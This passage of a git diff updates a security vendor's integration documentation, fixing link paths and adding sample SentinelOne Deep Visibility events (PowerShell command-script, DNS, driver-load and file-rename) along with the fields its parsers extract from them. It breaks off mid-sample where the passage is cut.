b/_shared_content/operations_center/integrations/generated/3f99cdd8-aeca-4860-a846-6f2a794583e1.md @@ -18,7 +18,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "connect.json" diff --git a/_shared_content/operations_center/integrations/generated/40bac399-2d8e-40e3-af3b-f73a622c9687.md b/_shared_content/operations_center/integrations/generated/40bac399-2d8e-40e3-af3b-f73a622c9687.md index 860d2d1204..9005fec225 100644 --- a/_shared_content/operations_center/integrations/generated/40bac399-2d8e-40e3-af3b-f73a622c9687.md +++ b/_shared_content/operations_center/integrations/generated/40bac399-2d8e-40e3-af3b-f73a622c9687.md @@ -27,7 +27,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "mcafee_access_log_blocked.json" diff --git a/_shared_content/operations_center/integrations/generated/40deb162-6bb1-4635-9c99-5c2de7e1d340.md b/_shared_content/operations_center/integrations/generated/40deb162-6bb1-4635-9c99-5c2de7e1d340.md index d265fe2cf2..3d2f093a22 100644 --- a/_shared_content/operations_center/integrations/generated/40deb162-6bb1-4635-9c99-5c2de7e1d340.md +++ b/_shared_content/operations_center/integrations/generated/40deb162-6bb1-4635-9c99-5c2de7e1d340.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "commandscript.json" @@ -44,6 +44,11 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "@timestamp": "2023-03-30T13:46:07.040000Z", + "action": { + "properties": { + "ScriptBlockText": "{(Format-DiskSpaceMB $_.Space) + \"MB\"}" + } + }, "agent": { "version": "22.3.2.373" }, @@ -63,12 +68,19 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } }, "process": { + "ossrc": { + "parent": { + "storyline_id": "0F91E6E7AB538ED5" + } + }, "parent": { "command_line": "taskhostw.exe", "executable": { "name": "C:\\Windows\\System32\\taskhostw.exe" - } - } + }, + "storyline_id": "3ED9E6E7AB538ED5" + }, + "storyline_id": "3ED9E6E7AB538ED5" }, "script": { "app_name": "PowerShell_C:\\Windows\\System32\\sdiagnhost.exe_10.0.19041.1", @@ -171,6 +183,159 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "commandscript_2.json" + + ```json + + { + "message": "{\"src.process.parent.isStorylineRoot\": false, \"event.category\": \"command_script\", \"tgt.file.modificationTime\": -11644473600000, \"src.process.parent.image.sha1\": \"99ae9c73e9bee6f9c76d6f4093a9882df06832cf\", \"site.id\": \"1470095163515336467\", \"src.process.image.binaryIsExecutable\": true, \"src.process.parent.displayName\": \"Windows Command Processor\", \"src.process.user\": \"AUTORITE NT\\\\Syst\\u00e8me\", \"src.process.parent.subsystem\": \"SYS_WIN32\", \"src.process.indicatorRansomwareCount\": 0, \"src.process.crossProcessDupRemoteProcessHandleCount\": 7, \"src.process.activeContent.signedStatus\": \"unsigned\", \"src.process.tgtFileCreationCount\": 0, \"src.process.indicatorInjectionCount\": 0, \"src.process.moduleCount\": 1800, \"i.version\": \"preprocess-lib-1.0\", \"src.process.parent.name\": \"cmd.exe\", \"src.process.activeContentType\": \"FILE\", \"src.process.parent.activeContent.id\": \"3EFA3EFA3EFA3EFA\", \"src.process.image.md5\": \"097ce5761c89434367598b34fe32893b\", \"src.process.storyline.id\": \"7FABCCD60C10799B\", \"src.process.indicatorReconnaissanceCount\": 69, \"src.process.childProcCount\": 6, \"mgmt.url\": \"euce1-sns-mssp.sentinelone.net\", \"src.process.crossProcessOpenProcessCount\": 0, \"cmdScript.isComplete\": true, \"src.process.subsystem\": \"SYS_WIN32\", \"meta.event.name\": \"SCRIPTS\", \"src.process.parent.integrityLevel\": \"SYSTEM\", \"src.process.indicatorExploitationCount\": 0, \"src.process.parent.storyline.id\": \"7FABCCD60C10799B\", \"tgt.file.creationTime\": -11644473600000, \"src.process.integrityLevel\": \"SYSTEM\", \"i.scheme\": \"edr\", \"site.name\": \"Default site\", \"src.process.netConnInCount\": 0, \"event.time\": 1722588221803, \"timestamp\": \"2024-08-02T08:43:41.803Z\", \"account.id\": \"1470095162995242762\", \"dataSource.name\": \"SentinelOne\", \"endpoint.name\": \"ntrsql15\", \"src.process.image.sha1\": \"044a0cf1f6bc478a7172bf207eef1e201a18ba02\", \"tgt.file.size\": 50105, \"cmdScript.applicationName\": \"PowerShell_C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe_10.0.14393.0\", \"src.process.isStorylineRoot\": false, \"src.process.parent.image.path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"tgt.file.sha1\": \"4b09001438b32e54b91cbe27685c75a316f8cdf5\", \"dataSource.vendor\": \"SentinelOne\", \"src.process.pid\": 3744, \"src.process.parent.activeContent.hash\": \"1b11fdf894b9a205b690add505ff5f2193c1fe48\", \"tgt.file.isSigned\": \"signed\", \"src.process.cmdline\": \"powershell -executionpolicy bypass -file \\\"c:\\\\zabbix\\\\scripts\\\\sb.mssql.ps1\\\" poller RUIWS01 \", \"src.process.publisher\": \"MICROSOFT WINDOWS\", \"dataSource.category\": \"security\", \"src.process.crossProcessThreadCreateCount\": 0, \"src.process.parent.isNative64Bit\": false, \"src.process.parent.activeContentType\": \"CLI\", \"src.process.parent.isRedirectCmdProcessor\": false, \"src.process.parent.activeContent.path\": \"\\\\\\\\Unknown device\\\\Unknown file\", \"src.process.crossProcessCount\": 7, \"src.process.signedStatus\": \"signed\", \"tgt.file.isExecutable\": false, \"event.id\": \"01J4945B0JAAYZXWF8ZG4A0VMZ_638\", \"src.process.parent.cmdline\": \"cmd /C \\\"powershell -executionpolicy bypass -file \\\"c:\\\\zabbix\\\\scripts\\\\sb.mssql.ps1\\\" poller RUIWS01 \\\"\", \"cmdScript.content\": \"{ updateInfo_Serveurs -instance_name $instance -datas_res $res_infos }\", \"src.process.image.path\": \"C:\\\\Windows\\\\System32\\\\WINDOWSPOWERSHELL\\\\V1.0\\\\powershell.EXE\", \"src.process.tgtFileModificationCount\": 21, \"src.process.indicatorEvasionCount\": 101, \"src.process.netConnOutCount\": 0, \"cmdScript.sha256\": \"b285d770802aac13330fd7d2a0ade3c9a7adf575d160a81dfc30614c7a89e775\", \"tgt.file.path\": \"C:\\\\zabbix\\\\scripts\\\\sb.mssql.ps1\", \"tgt.file.extension\": \"ps1\", \"src.process.crossProcessDupThreadHandleCount\": 0, \"endpoint.os\": \"windows\", \"src.process.tgtFileDeletionCount\": 0, \"src.process.startTime\": 1722588220577, \"mgmt.id\": \"16205\", \"os.name\": \"Windows Server 2016 Standard\", \"tgt.file.type\": \"UNKNOWN\", \"src.process.activeContent.id\": \"B76839D30C10799B\", \"src.process.displayName\": \"Windows PowerShell\", \"src.process.activeContent.path\": \"C:\\\\zabbix\\\\scripts\\\\sb.mssql.ps1\", \"src.process.isNative64Bit\": false, \"src.process.parent.sessionId\": 0, \"src.process.uid\": \"07AED4D60C10799B\", \"src.process.parent.image.md5\": \"f4f684066175b77e0c3a000549d2922c\", \"src.process.indicatorBootConfigurationUpdateCount\": 0, \"src.process.indicatorInfostealerCount\": 0, \"process.unique.key\": \"07AED4D60C10799B\", \"cmdScript.originalSize\": 140, \"agent.version\": \"23.4.4.223\", \"src.process.parent.uid\": \"05AED4D60C10799B\", \"src.process.parent.image.sha256\": \"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2\", \"src.process.sessionId\": 0, \"src.process.netConnCount\": 0, \"mgmt.osRevision\": \"14393\", \"group.id\": \"7FABCCD60C10799B\", \"src.process.isRedirectCmdProcessor\": false, \"src.process.verifiedStatus\": \"verified\", \"src.process.parent.publisher\": \"MICROSOFT WINDOWS\", \"src.process.parent.startTime\": 1722588220333, \"src.process.dnsCount\": 0, \"endpoint.type\": \"server\", \"trace.id\": \"01J4945B0JAAYZXWF8ZG4A0VMZ\", \"src.process.name\": \"powershell.EXE\", \"agent.uuid\": \"f373bf5f3c5541a49aad49c5d39deac8\", \"src.process.activeContent.hash\": \"4b09001438b32e54b91cbe27685c75a316f8cdf5\", \"src.process.image.sha256\": \"ba4038fd20e474c047be8aad5bfacdb1bfc1ddbe12f803f473b7918d8d819436\", \"src.process.indicatorGeneralCount\": 161, \"src.process.crossProcessOutOfStorylineCount\": 1, \"packet.id\": \"C6BB63A4EEC044B7BFEDC8B39D2594AD\", \"src.process.registryChangeCount\": 0, \"src.process.indicatorPersistenceCount\": 0, \"src.process.parent.signedStatus\": \"signed\", \"src.process.parent.user\": \"AUTORITE NT\\\\Syst\\u00e8me\", \"tgt.file.id\": \"B76839D30C10799B\", \"account.name\": \"S - SOCRAM BANQUE\", \"event.type\": \"Command Script\", \"task.path\": \"C:\\\\zabbix\\\\scripts\\\\sb.mssql.ps1\", \"src.process.indicatorPostExploitationCount\": 8, \"src.process.parent.activeContent.signedStatus\": \"unsigned\", \"src.process.parent.pid\": 3776}", + "event": { + "action": "Command Script", + "category": [ + "process" + ], + "dataset": "cloud-funnel-2.0", + "type": [ + "info" + ] + }, + "@timestamp": "2024-08-02T08:43:41.803000Z", + "action": { + "properties": { + "Path": "C:\\zabbix\\scripts\\sb.mssql.ps1", + "ScriptBlockText": "{ updateInfo_Serveurs -instance_name $instance -datas_res $res_infos }" + } + }, + "agent": { + "version": "23.4.4.223" + }, + "deepvisibility": { + "agent": { + "managment_url": "euce1-sns-mssp.sentinelone.net", + "trace_id": "01J4945B0JAAYZXWF8ZG4A0VMZ", + "uuid": "f373bf5f3c5541a49aad49c5d39deac8" + }, + "event": { + "category": "command_script", + "type": "Command Script" + }, + "host": { + "os": { + "revision": "14393" + } + }, + "process": { + "activecontent": { + "hash": { + "sha1": "4b09001438b32e54b91cbe27685c75a316f8cdf5" + }, + "path": "C:\\zabbix\\scripts\\sb.mssql.ps1" + }, + "parent": { + "activecontent": { + "path": "\\\\Unknown device\\Unknown file" + }, + "storyline_id": "7FABCCD60C10799B" + }, + "storyline_id": "7FABCCD60C10799B" + }, + "script": { + "app_name": "PowerShell_C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe_10.0.14393.0", + "content": "{ updateInfo_Serveurs -instance_name $instance -datas_res $res_infos }" + } + }, + "file": { + "code_signature": { + "exists": false + }, + "created": "1966-04-24T06:14:24Z", + "directory": "C:\\zabbix\\scripts", + "hash": { + "sha1": "4b09001438b32e54b91cbe27685c75a316f8cdf5", + "sha256": "b285d770802aac13330fd7d2a0ade3c9a7adf575d160a81dfc30614c7a89e775" + }, + "mtime": "1966-04-24T06:14:24Z", + "name": "sb.mssql.ps1", + "path": "C:\\zabbix\\scripts\\sb.mssql.ps1", + "size": 140 + }, + "host": { + "name": "ntrsql15", + "os": { + "family": "windows", + "name": "Windows Server 2016 Standard" + }, + "type": "server" + }, + "observer": { + "vendor": "SentinelOne" + }, + "process": { + "code_signature": { + "exists": true, + "subject_name": "MICROSOFT WINDOWS" + }, + "command_line": "powershell -executionpolicy bypass -file \"c:\\zabbix\\scripts\\sb.mssql.ps1\" poller RUIWS01 ", + "executable": "C:\\Windows\\System32\\WINDOWSPOWERSHELL\\V1.0\\powershell.EXE", + "hash": { + "md5": "097ce5761c89434367598b34fe32893b", + "sha1": "044a0cf1f6bc478a7172bf207eef1e201a18ba02", + "sha256": "ba4038fd20e474c047be8aad5bfacdb1bfc1ddbe12f803f473b7918d8d819436" + }, + "name": "powershell.EXE", + "parent": { + "code_signature": { + "exists": true, + "subject_name": "MICROSOFT WINDOWS" + }, + "command_line": "cmd /C \"powershell -executionpolicy bypass -file \"c:\\zabbix\\scripts\\sb.mssql.ps1\" poller RUIWS01 \"", + "executable": "C:\\Windows\\System32\\cmd.exe", + "hash": { + "md5": "f4f684066175b77e0c3a000549d2922c", + "sha1": "99ae9c73e9bee6f9c76d6f4093a9882df06832cf", + "sha256": "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2" + }, + "name": "cmd.exe", + "pid": 3776, + "start": "2024-08-02T08:43:40.333000Z", + "title": "Windows Command Processor", + "user": { + "name": "AUTORITE NT\\Syst\u00e8me" + }, + "working_directory": "C:\\Windows\\System32" + }, + "pid": 3744, + "start": "2024-08-02T08:43:40.577000Z", + "title": "Windows PowerShell", + "user": { + "name": "AUTORITE NT\\Syst\u00e8me" + }, + "working_directory": "C:\\Windows\\System32\\WINDOWSPOWERSHELL\\V1.0" + }, + "related": { + "hash": [ + "044a0cf1f6bc478a7172bf207eef1e201a18ba02", + "097ce5761c89434367598b34fe32893b", + "4b09001438b32e54b91cbe27685c75a316f8cdf5", + "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2", + "99ae9c73e9bee6f9c76d6f4093a9882df06832cf", + "b285d770802aac13330fd7d2a0ade3c9a7adf575d160a81dfc30614c7a89e775", + "ba4038fd20e474c047be8aad5bfacdb1bfc1ddbe12f803f473b7918d8d819436", + "f4f684066175b77e0c3a000549d2922c" + ], + "user": [ + "Syst\u00e8me" + ] + }, + "user": { + "domain": "AUTORITE NT", + "name": "Syst\u00e8me" + } + } + + ``` + + === "dns_dnsresolved.json" ```json @@ -215,12 +380,20 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "sha256": "20330d3ca71d58f4aeb432676cb6a3d5b97005954e45132fb083e90782efdd50" }, "name": "backgroundTaskHost.exe", + "ossrc": { + "parent": { + "storyline_id": "5696E5E7AB538ED5" + }, + "storyline_id": "AC96E5E7AB538ED5" + }, "parent": { "command_line": "sihost.exe", "executable": { "name": "C:\\Windows\\System32\\sihost.exe" - } - } + }, + "storyline_id": "BE98E5E7AB538ED5" + }, + "storyline_id": "6EB4E5E7AB538ED5" } }, "dns": { @@ -323,6 +496,132 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "dns_macos.json" + + ```json + + { + "message": "{\n \"src.process.image.path\": \"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/123.0.6312.123/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper\",\n \"src.process.subsystem\": \"SUBSYSTEM_UNKNOWN\",\n \"src.process.parent.isStorylineRoot\": true,\n \"event.category\": \"dns\",\n \"src.process.parent.integrityLevel\": \"INTEGRITY_LEVEL_UNKNOWN\",\n \"src.process.parent.image.sha1\": \"adc83b19e793491b1c6ea0fd8b46cd9f32e592fc\",\n \"src.process.parent.storyline.id\": \"0A62D926-DFE7-4968-AA28-F0024BAC804D\",\n \"src.process.isRedirectCmdProcessor\": false,\n \"src.process.parent.publisher\": \"\",\n \"src.process.parent.startTime\": 1713167784335,\n \"endpoint.type\": \"laptop\",\n \"endpoint.os\": \"osx\",\n \"src.process.integrityLevel\": \"INTEGRITY_LEVEL_UNKNOWN\",\n \"src.process.parent.displayName\": \"Google Chrome\",\n \"src.process.name\": \"Google Chrome Helper\",\n \"src.process.startTime\": 1713167795818,\n \"agent.uuid\": \"75084C59-0F8A-479D-A9C4-2232C37D9D51\",\n \"event.dns.response\": \"type: 5 edge-web-gew4.dual-gslb.spotify.com;2600:1901:1:4be::;\",\n \"src.process.image.sha256\": \"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\n \"src.process.user\": \"jdoe\",\n \"timestamp\": \"2024-06-26T08:44:30.000Z\",\n \"src.process.displayName\": \"Google Chrome Helper\",\n \"endpoint.name\": \"MXY2XC6J7VJ\",\n \"src.process.image.sha1\": \"adc83b19e793491b1c6ea0fd8b46cd9f32e592fc\",\n \"event.dns.request\": \"type: 28 gew4-spclient.spotify.com\",\n \"src.process.isStorylineRoot\": false,\n \"src.process.parent.image.path\": \"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome\",\n \"src.process.isNative64Bit\": false,\n \"src.process.parent.sessionId\": 0,\n \"src.process.uid\": \"CF37475F-BCA9-4F89-8A31-7B6C88CC6F1E\",\n \"src.process.parent.image.md5\": \"68b329da9893e34099c7d8ad5cb9c940\",\n \"src.process.parent.user\": \"psinha\",\n \"src.process.pid\": 1063,\n \"src.process.parent.name\": \"Google Chrome\",\n \"src.process.cmdline\": \"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/123.0.6312.123/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=network --shared-files --field-trial-handle=1718379636,r,10310964397040083203,6939088771020272477,262144 --variations-seed-version=20240412-130119.249000 --seatbelt-client=25\",\n \"src.process.publisher\": \"\",\n \"src.process.parent.isNative64Bit\": false,\n \"src.process.parent.isRedirectCmdProcessor\": false,\n \"src.process.image.md5\": \"68b329da9893e34099c7d8ad5cb9c940\",\n \"src.process.storyline.id\": \"0A62D926-DFE7-4968-AA28-F0024BAC804D\",\n \"event.type\": \"DNS Resolved\",\n \"agent.version\": \"24.1.2.7444\",\n \"src.process.signedStatus\": \"signed\",\n \"src.process.parent.image.sha256\": \"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\n \"src.process.parent.cmdline\": \"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome\",\n \"src.process.sessionId\": 0,\n \"src.process.parent.pid\": 790\n}\n", + "event": { + "action": "DNS Resolved", + "category": [ + "network" + ], + "dataset": "cloud-funnel-2.0", + "type": [ + "info" + ] + }, + "@timestamp": "2024-06-26T08:44:30Z", + "agent": { + "version": "24.1.2.7444" + }, + "deepvisibility": { + "agent": { + "uuid": "75084C59-0F8A-479D-A9C4-2232C37D9D51" + }, + "event": { + "category": "dns", + "type": "DNS Resolved" + }, + "process": { + "parent": { + "storyline_id": "0A62D926-DFE7-4968-AA28-F0024BAC804D" + }, + "storyline_id": "0A62D926-DFE7-4968-AA28-F0024BAC804D" + } + }, + "dns": { + "answers": [ + { + "name": "edge-web-gew4.dual-gslb.spotify.com", + "type": "CNAME" + }, + { + "name": "2600:1901:1:4be::", + "type": "AAAA" + } + ], + "question": { + "name": "gew4-spclient.spotify.com", + "registered_domain": "spotify.com", + "subdomain": "gew4-spclient", + "top_level_domain": "com" + }, + "type": "answer" + }, + "host": { + "name": "MXY2XC6J7VJ", + "os": { + "family": "osx" + }, + "type": "laptop" + }, + "observer": { + "vendor": "SentinelOne" + }, + "process": { + "code_signature": { + "exists": true, + "subject_name": "" + }, + "command_line": "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/123.0.6312.123/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=network --shared-files --field-trial-handle=1718379636,r,10310964397040083203,6939088771020272477,262144 --variations-seed-version=20240412-130119.249000 --seatbelt-client=25", + "executable": "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/123.0.6312.123/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper", + "hash": { + "md5": "68b329da9893e34099c7d8ad5cb9c940", + "sha1": "adc83b19e793491b1c6ea0fd8b46cd9f32e592fc", + "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + }, + "name": "Google Chrome Helper", + "parent": { + "code_signature": { + "exists": false + }, + "command_line": "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome", + "executable": "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome", + "hash": { + "md5": "68b329da9893e34099c7d8ad5cb9c940", + "sha1": "adc83b19e793491b1c6ea0fd8b46cd9f32e592fc", + "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + }, + "name": "Google Chrome", + "pid": 790, + "start": "2024-04-15T07:56:24.335000Z", + "title": "Google Chrome", + "user": { + "name": "psinha" + }, + "working_directory": "/Applications/Google Chrome.app/Contents/MacOS" + }, + "pid": 1063, + "start": "2024-04-15T07:56:35.818000Z", + "title": "Google Chrome Helper", + "user": { + "name": "jdoe" + }, + "working_directory": "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/123.0.6312.123/Helpers/Google Chrome Helper.app/Contents/MacOS" + }, + "related": { + "hash": [ + "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b", + "68b329da9893e34099c7d8ad5cb9c940", + "adc83b19e793491b1c6ea0fd8b46cd9f32e592fc" + ], + "hosts": [ + "gew4-spclient.spotify.com" + ], + "user": [ + "jdoe" + ] + }, + "user": { + "name": "jdoe" + } + } + + ``` + + === "driver_driverload.json" ```json @@ -363,6 +662,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "os": { "revision": "19044" } + }, + "process": { + "parent": { + "storyline_id": "4735E7E7AB538ED5" + }, + "storyline_id": "4735E7E7AB538ED5" } }, "file": { @@ -481,6 +786,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "os": { "revision": "19044" } + }, + "process": { + "parent": { + "storyline_id": "0447E5E7AB538ED5" + }, + "storyline_id": "DA84E5E7AB538ED5" } }, "file": { @@ -612,7 +923,14 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "hash": { "sha256": "db780e2e5d8608f9a0bc77822ccbee64c8deece0120244b31af3fc4a8336d1aa" }, - "name": "msedge.exe" + "name": "msedge.exe", + "ossrc": { + "storyline_id": "14C2E6E7AB538ED5" + }, + "parent": { + "storyline_id": "96BFE6E7AB538ED5" + }, + "storyline_id": "14C2E6E7AB538ED5" } }, "file": { @@ -731,10 +1049,19 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "category": "file", "type": "File Rename" }, + "file": { + "old_path": "C:\\WindowsAzure\\Logs\\AggregateStatus\\aggregatestatus.json" + }, "host": { "os": { "revision": "19044" } + }, + "process": { + "parent": { + "storyline_id": "D7D0E5E7AB538ED5" + }, + "storyline_id": "85D1E5E7AB538ED5" } }, "file": { @@ -823,6 +1150,133 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "fileoldpath.json" + + ```json + + { + "message": "{\"src.process.parent.isStorylineRoot\":false,\"event.category\":\"file\",\"src.process.parent.image.sha1\":\"0000000\",\"site.id\":\"00000000\",\"tgt.file.location\":\"Local\",\"src.process.parent.displayName\":\"pparent\",\"src.process.parent.subsystem\":\"SUBSYSTEM_UNKNOWN\",\"src.process.indicatorRansomwareCount\":0,\"src.process.crossProcessDupRemoteProcessHandleCount\":0,\"src.process.tgtFileCreationCount\":1,\"src.process.indicatorInjectionCount\":0,\"src.process.moduleCount\":0,\"i.version\":\"preprocess-lib-1.0\",\"src.process.parent.name\":\"pname\",\"src.process.storyline.id\":\"00000-0000-0000-0000000\",\"src.process.indicatorReconnaissanceCount\":0,\"src.process.childProcCount\":0,\"aaaa.url\":\"redacted.sentinelone.net\",\"src.process.parent.eUserName\":\"aaaaaaaa\",\"src.process.crossProcessOpenProcessCount\":0,\"src.process.eUserName\":\"aaaaaaaa\",\"src.process.subsystem\":\"SUBSYSTEM_UNKNOWN\",\"meta.event.name\":\"FILERENAME\",\"src.process.parent.integrityLevel\":\"INTEGRITY_LEVEL_UNKNOWN\",\"src.process.indicatorExploitationCount\":0,\"src.process.parent.storyline.id\":\"0000000-0000-0000-00000000\",\"tgt.file.creationTime\":1722852662250,\"src.process.integrityLevel\":\"INTEGRITY_LEVEL_UNKNOWN\",\"i.scheme\":\"edr\",\"site.name\":\"sitename\",\"src.process.netConnInCount\":0,\"event.time\":1722853381979,\"timestamp\":\"2024-08-05T10:23:01.979Z\",\"account.id\":\"00000000000\",\"dataSource.name\":\"SentinelOne\",\"endpoint.name\":\"aaaaaaaaa\",\"src.process.image.sha1\":\"aaaaaaaaaaaaaa\",\"tgt.file.size\":750,\"src.process.isStorylineRoot\":false,\"src.process.parent.image.path\":\"\\/bin\\/pparent\",\"src.process.lUserName\":\"aaaaaaaa\",\"dataSource.vendor\":\"SentinelOne\",\"src.process.pid\":31304,\"tgt.file.isSigned\":\"unsigned\",\"src.process.cmdline\":\" \\/usr\\/cmd -\",\"dataSource.category\":\"security\",\"src.process.crossProcessThreadCreateCount\":0,\"src.process.parent.isNative64Bit\":false,\"src.process.parent.isRedirectCmdProcessor\":false,\"src.process.parent.rUserUid\":1111,\"src.process.crossProcessCount\":0,\"src.process.signedStatus\":\"unsigned\",\"event.id\":\"01J4H129Q4744MK0FX0CNXASK1_414\",\"src.process.image.path\":\"\\/usr\\/path\",\"src.process.tgtFileModificationCount\":2,\"src.process.indicatorEvasionCount\":0,\"src.process.netConnOutCount\":0,\"tgt.file.path\":\"\\/new\\/new\\/file\\/path\\/path\",\"src.process.eUserUid\":1111,\"src.process.lUserUid\":1111,\"src.process.crossProcessDupThreadHandleCount\":0,\"endpoint.os\":\"linux\",\"src.process.tgtFileDeletionCount\":0,\"src.process.startTime\":1722853381100,\"mgmt.id\":\"00000\",\"os.name\":\"Linux\",\"tgt.file.type\":\"UNKNOWN\",\"src.process.displayName\":\"aaaaaaaaa\",\"src.process.isNative64Bit\":false,\"src.process.parent.sessionId\":0,\"src.process.rUserUid\":1111,\"src.process.uid\":\"000000000-0000-0000-00000000000\",\"src.process.indicatorBootConfigurationUpdateCount\":0,\"src.process.indicatorInfostealerCount\":0,\"process.unique.key\":\"000000000-0000-0000-000000000\",\"src.process.parent.eUserUid\":112,\"agent.version\":\"1\",\"src.process.parent.uid\":\"000000000-0000-0000-0000000000000000\",\"src.process.parent.rUserName\":\"aaaaaaaaa\",\"src.process.sessionId\":0,\"src.process.netConnCount\":0,\"mgmt.osRevision\":\"Debian\",\"group.id\":\"000000000-0000-0000-00000000\",\"src.process.isRedirectCmdProcessor\":false,\"src.process.parent.startTime\":1722853381090,\"src.process.dnsCount\":0,\"endpoint.type\":\"server\",\"tgt.file.oldPath\":\"\\/old\\/path\\/name\\/tmp.aaaa\",\"trace.id\":\"00000000000\",\"src.process.rUserName\":\"aaaaaaaaa\",\"src.process.name\":\"aaaaa\",\"agent.uuid\":\"00000-0000-0000-000000\",\"src.process.parent.lUserName\":\"aaaaaaaa\",\"src.process.indicatorGeneralCount\":0,\"src.process.parent.lUserUid\":1111,\"src.process.crossProcessOutOfStorylineCount\":0,\"packet.id\":\"000000-0000-0000-000000000000\",\"src.process.registryChangeCount\":0,\"src.process.indicatorPersistenceCount\":3,\"src.process.parent.signedStatus\":\"unsigned\",\"tgt.file.id\":\"00000-0000-0000-0000000000\",\"account.name\":\"account_name\",\"event.type\":\"File Rename\",\"task.path\":\"\\/var\\/aaa\\/aaa\\/aaaa\\/aaaa\",\"src.process.indicatorPostExploitationCount\":0,\"src.process.parent.pid\":111111}", + "event": { + "action": "File Rename", + "category": [ + "file" + ], + "dataset": "cloud-funnel-2.0", + "type": [ + "change" + ] + }, + "@timestamp": "2024-08-05T10:23:01.979000Z", + "agent": { + "version": "1" + }, + "deepvisibility": { + "agent": { + "trace_id": "00000000000", + "uuid": "00000-0000-0000-000000" + }, + "event": { + "category": "file", + "type": "File Rename" + }, + "file": { + "old_path": "/old/path/name/tmp.aaaa" + }, + "host": { + "os": { + "revision": "Debian" + } + }, + "process": { + "parent": { + "storyline_id": "0000000-0000-0000-00000000" + }, + "storyline_id": "00000-0000-0000-0000000" + } + }, + "file": { + "code_signature": { + "exists": false + }, + "created": "2024-08-05T10:11:02.250000Z", + "directory": "/new/new/file/path", + "name": "path", + "path": "/new/new/file/path/path", + "size": 750 + }, + "host": { + "name": "aaaaaaaaa", + "os": { + "family": "linux", + "name": "Linux" + }, + "type": "server" + }, + "observer": { + "vendor": "SentinelOne" + }, + "process": { + "code_signature": { + "exists": false + }, + "command_line": " /usr/cmd -", + "executable": "/usr/path", + "hash": { + "sha1": "aaaaaaaaaaaaaa" + }, + "name": "aaaaa", + "parent": { + "code_signature": { + "exists": false + }, + "executable": "/bin/pparent", + "hash": { + "sha1": "0000000" + }, + "name": "pname", + "pid": 111111, + 